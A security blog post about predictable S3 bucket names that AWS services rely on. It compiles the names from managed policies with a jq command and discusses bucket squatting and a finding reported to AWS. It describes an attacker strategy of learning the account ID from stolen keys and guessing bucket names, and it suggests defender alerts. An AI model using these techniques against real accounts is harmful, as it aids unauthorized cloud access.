AWS resource naming patterns

2019.02.10

RSS feed

Recently @notsosecure posted an interesting blog post titled Exploiting SSRF in AWS Elastic Beanstalk. It starts off with using SSRF to get access to 169.254.169.254 in order to get session credentials from the target. Where the post gets interesting is when they can’t run aws s3 ls, but based on the role name they do some searching and discover they have access to the S3 bucket elasticbeanstalk-us-east-2-69XXXXXXXX79. In this post I explore the resource naming patterns that AWS relies on.

AWS managed policies are IAM policies used by AWS services or recommended by AWS to perform common functions. I’ve written previously about the problems and dangers of using AWS managed policies in my post AWS Managed Policies are an anti-pattern. The interesting thing from these policies and from reading the AWS docs is you often run into resource naming patterns that services either rely on or use for defaults. An example is the S3 bucket name elasticbeanstalk-REGION-ACCOUNTID that is used by ElasticBeanstalk as discussed in the NotSoSecure post. Another example is the Athena service by default stores its results in the S3 bucket aws-athena-query-results-ACCOUNTID-REGION. In the case of the NotSoSecure post, they didn’t have privileges to list the buckets in the account, but were able to have privileges to list objects and read and write objects in this one bucket if they knew its name.

I was curious what other naming patterns exist and decided to compile a list by looking at the AWS managed policies that grant access to these resources. In the case of ElasticBeanstalk, you can see it allows access to S3 buckets that match elasticbeanstalk-* from the managed policy statement in the policy [AWSElasticBeanstalkWebTier] (https://github.com/SummitRoute/aws_managed_policies/blob/ad4c2e8fdf77143515c3ca9f6efc0f4181ec6955/policies/AWSElasticBeanstalkWebTier#L15).

{
    "Action": [
        "s3:Get*", 
        "s3:List*", 
        "s3:PutObject"
    ], 
    "Resource": [
        "arn:aws:s3:::elasticbeanstalk-*", 
        "arn:aws:s3:::elasticbeanstalk-*/*"
    ], 
    "Effect": "Allow", 
    "Sid": "BucketAccess"
}

In the case of Athena, you can see the managed policy AmazonAthenaFullAccess allows access to S3 buckets that match the pattern aws-athena-query-results-*.

My first step was to download all of the managed policies. I did this and put them in the git repo aws_managed_policies along with instructions on how I collected these.

With the policies as files, I then ran:

cat policies/* | jq '.PolicyVersion.Document.Statement[].Resource' | sed 's/  //' | sort | uniq

By additionally adding in the resources from the policies that have Statement as an object instead of an array, we get the list shown in the gist here.

One strategy if you end up with access keys, but no ability to list buckets, would be to run aws sts get-caller-identity (a call that always works) to get the ACCOUNTID, and try to iterate through those S3 bucket names with -REGION-ACCOUNTID and -ACCOUNTID-REGION appended, where you iterate though the 16 region names.

Looking at that list, we can see an interesting value is appstream2-36fb080bb8-* which is documented for AppStream here as appstream2-36fb080bb8-REGION-ACCOUNTID. I guess that 36fb080bb8 is supposed to be a “secret” value to make this harder to find? This is hard-coded for all accounts though.

An interesting result of AWS’s reliance on hard-coded patterns like this is an attacker could squat on these bucket names for an account, by creating those buckets in their own account before the target does. If the target then ever tries to use these services it can result in denying access to the service, as it can’t read and write the objects it tries to. Another strategy for the attacker would be to create this bucket and make it readable and writeable to the target account. In my testing, the AWS services don’t have checks to ensure the bucket is owned by your own account, so they’ll happily read and write objects to this attacker controlled bucket. In my testing, as an attacker I couldn’t actually read the written objects, but I could delete them. I only tested one of these services though. I reported this to AWS, and they view it as an accepted risk, which seems reasonable given the limited impact, but personally I think AWS should restrict the ability of accounts to create buckets with names like these.

Anyway, as an attacker, if you get an AWS access key, but can’t list buckets in an account, you might want to try to try to list objects in the bucket patterns listed here. As a defender, you could create alerts for failed queries against these buckets (/me nudges the GuardDuty team).